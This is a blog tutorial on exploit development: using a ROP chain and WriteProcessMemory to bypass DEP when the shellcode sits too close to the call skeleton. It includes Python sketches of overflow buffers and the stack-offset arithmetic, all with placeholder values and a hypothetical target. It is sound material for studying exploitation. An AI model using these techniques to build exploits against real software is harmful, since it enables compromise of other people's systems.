Bypassing DEP - Increasing the Gap
This blog covers how to use the WriteProcessMemory API call to execute shellcode when there is very little room between the shellcode and the WriteProcessMemory call skeleton.
In this blog, I document a lesser-known way to bypass DEP with the WriteProcessMemory API call when your shellcode is large but the space available for inserting it is small. We will look at how you can give up part of the ROP chain's space so that the shellcode is not corrupted while WriteProcessMemory runs.
The WriteProcessMemory API call is defined with the following five arguments :-
The first is hProcess, a handle to the process whose memory will be written; passing -1, the pseudo-handle returned by GetCurrentProcess, targets the current process. Next is lpBaseAddress, the destination address for the copy. Then comes lpBuffer, the source address from which the bytes are copied, followed by nSize, the number of bytes to copy. Finally, lpNumberOfBytesWritten is the address where WriteProcessMemory stores the number of bytes it actually copied. This address must be writable.
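For reference, Microsoft documents the prototype as BOOL WriteProcessMemory(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten). The sketch below only models those five arguments in Python so the later stack arithmetic has names to refer to. The class name and every address in it are made up for illustration.

```python
from typing import NamedTuple

# -1 as an unsigned 32-bit value: the pseudo-handle for the current process.
CURRENT_PROCESS = 0xFFFFFFFF


class WriteProcessMemoryArgs(NamedTuple):
    """The five arguments in prototype order (hypothetical helper type)."""
    h_process: int                   # handle of the process to write into
    lp_base_address: int             # destination address
    lp_buffer: int                   # source address
    n_size: int                      # number of bytes to copy
    lp_number_of_bytes_written: int  # writable address that receives the count


# Placeholder values only; real ones have to be resolved at runtime.
args = WriteProcessMemoryArgs(
    h_process=CURRENT_PROCESS,
    lp_base_address=0x10001000,
    lp_buffer=0x0012F000,
    n_size=410,
    lp_number_of_bytes_written=0x10002000,
)

# On 32-bit x86 each argument occupies one 4-byte stack slot.
ARG_BYTES = 4 * len(args)
print(ARG_BYTES)  # 20
```

Those 20 bytes of arguments are what the call expects to find on the stack, right after the return address.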
Vulnerable Application
Moving on, let's assume a scenario where an application is vulnerable to a buffer overflow. Say the EIP overwrite happens at the 451st byte of the input buffer, and a total of 750 bytes must be sent to trigger the overflow. In that case the input would look like this :-
Input buffer = "A"*450 + "B"*4 + "C"*(750-450-4)
In this case, once we send the above input to the vulnerable application, it overwrites EIP with 0x42424242 and crashes the program. We also verify that the application is compiled with DEP, so executing shellcode will require ROP chains.
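A quick way to sanity-check the crash buffer is to build it in Python and assert on its size and on where the four Bs land. This is only a sketch: the constant names are mine, and the trailing filler is computed so that the total comes out to exactly 750 bytes.

```python
EIP_OFFSET = 450   # bytes that precede the saved return address
TOTAL_SIZE = 750   # bytes needed to trigger the overflow

crash = b"A" * EIP_OFFSET + b"B" * 4 + b"C" * (TOTAL_SIZE - EIP_OFFSET - 4)

# The buffer has the expected length and the Bs sit where EIP is taken from.
assert len(crash) == TOTAL_SIZE
assert crash[EIP_OFFSET:EIP_OFFSET + 4] == b"BBBB"  # shows up as 0x42424242
```

How the buffer reaches the application (socket, file, argument) depends on the target and is left out here.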
Let's assume that our shellcode is 410 bytes long. We send it in place of the leading As, so the input now looks like this :-
Input buffer = shellcode + "A"*(450-410) + "B"*4 + "C"*296
Now, let's create the skeleton for WriteProcessMemory API Call.
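One way to lay out such a skeleton is sketched below. It assumes the common arrangement of the function address, a return address, and then the five arguments, which gives seven 4-byte values and matches the 28-byte wp used in this post. The marker values are arbitrary placeholders that the ROP chain would overwrite at runtime.

```python
import struct

# Dummy markers (hypothetical values) for fields the ROP chain patches later.
WPM_ADDRESS = 0x45454545      # address of WriteProcessMemory
RETURN_ADDRESS = 0x46464646   # assumption: where execution continues after the call
H_PROCESS = 0xFFFFFFFF        # -1, the current-process pseudo-handle
LP_BASE_ADDRESS = 0x47474747  # destination of the copy
LP_BUFFER = 0x48484848        # source: where the shellcode sits on the stack
N_SIZE = 0x49494949           # number of bytes to copy
LP_NUM_WRITTEN = 0x4A4A4A4A   # any writable address

# Seven little-endian DWORDs, in the order they are consumed from the stack.
wp = struct.pack(
    "<7I",
    WPM_ADDRESS,
    RETURN_ADDRESS,
    H_PROCESS,
    LP_BASE_ADDRESS,
    LP_BUFFER,
    N_SIZE,
    LP_NUM_WRITTEN,
)

assert len(wp) == 28
```

Recognizable markers make it easy to spot each slot in the debugger while writing the gadgets that patch them.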
Now the input looks something like this, where wp is the WriteProcessMemory skeleton (28 bytes) :-
Input buffer = shellcode + "A"*12 + wp + EIP + <ROP Chain>
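To see where each piece sits, the offsets can be worked out from the numbers used so far (410-byte shellcode, 28-byte wp, EIP at offset 450). The sketch below uses placeholder bytes for the shellcode and wp and leaves the ROP chain empty; all names are illustrative.

```python
SHELLCODE_SIZE = 410
WP_SIZE = 28
EIP_OFFSET = 450

# Whatever is left before EIP becomes padding between the shellcode and wp.
padding = EIP_OFFSET - SHELLCODE_SIZE - WP_SIZE

shellcode = b"\xcc" * SHELLCODE_SIZE  # placeholder bytes, not real shellcode
wp = b"W" * WP_SIZE                   # placeholder for the 28-byte skeleton
eip = b"B" * 4                        # placeholder for the first gadget address
rop = b""                             # ROP chain omitted in this sketch

buf = shellcode + b"A" * padding + wp + eip + rop

wp_start = SHELLCODE_SIZE + padding
layout = {
    "shellcode": (0, SHELLCODE_SIZE),
    "padding": (SHELLCODE_SIZE, wp_start),
    "wp": (wp_start, wp_start + WP_SIZE),
    "eip": (EIP_OFFSET, EIP_OFFSET + 4),
}

for name, (start, end) in layout.items():
    print(f"{name:10s} {start:3d}..{end:3d}")
```

The padding works out to 12 bytes, so wp starts only 12 bytes after the last shellcode byte.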
A question for readers: does the above input structure look safe from shellcode corruption once our ROP chain has patched wp at runtime and redirected execution to the start of wp?
If you answered NO, great work. You identified a potential rabbit hole and saved yourself some time.
If you answered YES, you just dropped into the same rabbit hole I did :) . Let's talk about why.
Journey down the Rabbit Hole
To understand the issue, let's dive into the disassembly of the WriteProcessMemory function.
Let's skim through WriteProcessMemory in kernelbase. Early in the function there is a sub esp, 30 instruction (the operand is hexadecimal, 0x30), which allocates stack space for WriteProcessMemory's own use. The function's prologue is followed by multiple push instructions, which write to the stack.
Recall that our input buffer was of format
input buffer = shellcode + "A" * 12 + wp + EIP + ROP
The moment our ROP gadgets redirect execution to the start of wp, it jumps directly into the WriteProcessMemory function. To make this concrete, let's assume that wp starts at address 0x5000000. In the address space, the 12 bytes of padding then occupy 0x4fffff4 to 0x4ffffff, and the shellcode ends at 0x4fffff3, just below wp.
Before WriteProcessMemory executes, ESP points to the start of wp (read up on the basics of ROP chains for why), and it still points there when the function begins. When EIP reaches address 0x755f3995 in WriteProcessMemory, ESP is still 0x5000000. The instruction at that address, sub esp,30, then moves ESP down to 0x4ffffd0 (0x5000000 - 0x30). As you might have guessed, this is where the problem starts.
Since only 12 bytes separate the end of the shellcode from the start of wp, ESP ends up pointing inside our shellcode. The subsequent push instructions then overwrite shellcode bytes, and the exploit fails.
Now that we understand the rabbit hole, let's find a way out.
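The arithmetic is easy to check. The sketch below follows the simplified model used in this post, where ESP equals the start of wp when sub esp,30 executes; it ignores the prologue's own pushes and everything pushed afterwards, all of which only move ESP lower. The variable names are mine.

```python
WP_START = 0x5000000   # assumed address of wp, as in the text
PADDING = 12           # bytes between the shellcode and wp
SHELLCODE_SIZE = 410
SUB_ESP = 0x30         # operand of the sub esp instruction

shellcode_end = WP_START - PADDING             # first byte after the shellcode
shellcode_start = shellcode_end - SHELLCODE_SIZE

esp_after_sub = WP_START - SUB_ESP
inside_shellcode = shellcode_start <= esp_after_sub < shellcode_end
exposed_bytes = shellcode_end - esp_after_sub  # shellcode tail above the new ESP

print(hex(esp_after_sub))  # 0x4ffffd0
print(inside_shellcode)    # True
print(exposed_bytes)       # 36
```

So the last 36 bytes of the shellcode already sit inside the freshly reserved stack area, and every push after that writes further down into the shellcode.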
Getting out of Rabbit Hole
The basic idea is to increase the space between the end of the shellcode and the start of wp so that ESP doesn't end up inside our shellcode. We can do something interesting here.
Suggested input structure :-
Input buffer = shellcode + "A"*(450-410) + EIP + <dummy instructions to increase gap between shellcode and wp> + wp + rop
The proposed input structure uses dummy instructions to increase the gap between the shellcode and wp. We can use gadgets like xor eax,eax or any other non-destructive instruction to widen this gap. But this comes with a trade-off: it eats into our space for ROP chains. The more dummy instructions we add, the less space is left for the ROP chain.
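To put a number on the trade-off, here is a rough sketch of how many filler gadgets a given amount of stack usage would call for. Each gadget address takes one 4-byte stack slot, so n fillers add 4n bytes of gap. The existing gap of 44 bytes assumes 40 bytes of padding (450 - 410) plus the 4-byte EIP slot. The 0x40 bytes of extra stack usage on top of the 0x30 reservation is a purely hypothetical figure; the real value has to be measured in a debugger.

```python
import math

SLOT = 4  # each gadget address occupies one 4-byte stack slot


def fillers_needed(existing_gap: int, stack_needed: int) -> int:
    """Number of 4-byte filler gadgets needed to cover the shortfall."""
    shortfall = max(0, stack_needed - existing_gap)
    return math.ceil(shortfall / SLOT)


existing_gap = (450 - 410) + 4  # padding after the shellcode + EIP slot
stack_needed = 0x30 + 0x40      # sub esp,30 plus a hypothetical 0x40 of pushes

n = fillers_needed(existing_gap, stack_needed)
print(n, n * SLOT)  # 17 68
```

Under those assumptions, 17 fillers cost 68 bytes that would otherwise be available to the ROP chain.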
One trick to work around this is to use a gadget like add esp,0x20, which moves ESP forward directly instead of stepping through dummy instructions one at a time, widening the gap between the shellcode and ESP. This needs fewer dummy instructions and can land us right in the ROP chain. With proper stack alignment, it can be used to make execution resume at the start of our ROP chain rather than somewhere in the middle.
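Where execution resumes after such a gadget can be computed up front. The sketch below assumes the gadget is exactly add esp,0x20 followed by ret, and that the vulnerable function returned with a plain ret, so ESP sits just past the EIP slot when the gadget starts. The function name and constants are illustrative.

```python
EIP_OFFSET = 450  # offset of the overwritten return address in the buffer
SLOT = 4          # size of one stack slot on 32-bit x86


def landing_offset(eip_offset: int, add_esp: int) -> int:
    """Buffer offset of the DWORD that the gadget's final ret pops."""
    esp_at_gadget = eip_offset + SLOT  # ESP after returning into the gadget
    return esp_at_gadget + add_esp     # ESP after add esp, add_esp


offset = landing_offset(EIP_OFFSET, 0x20)
skipped_slots = 0x20 // SLOT

print(offset)         # 486
print(skipped_slots)  # 8
```

A single gadget address therefore skips the same 32 bytes that eight filler gadgets would have walked through, and the next ROP gadget address belongs at offset 486 of the buffer.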
Conclusion
I discovered this trick during my learning process. I have not come across many blogs explaining how to work around the size restriction, so I thought it would be a good idea to share it with the community. Contact me on Twitter with any feedback.
Thanks!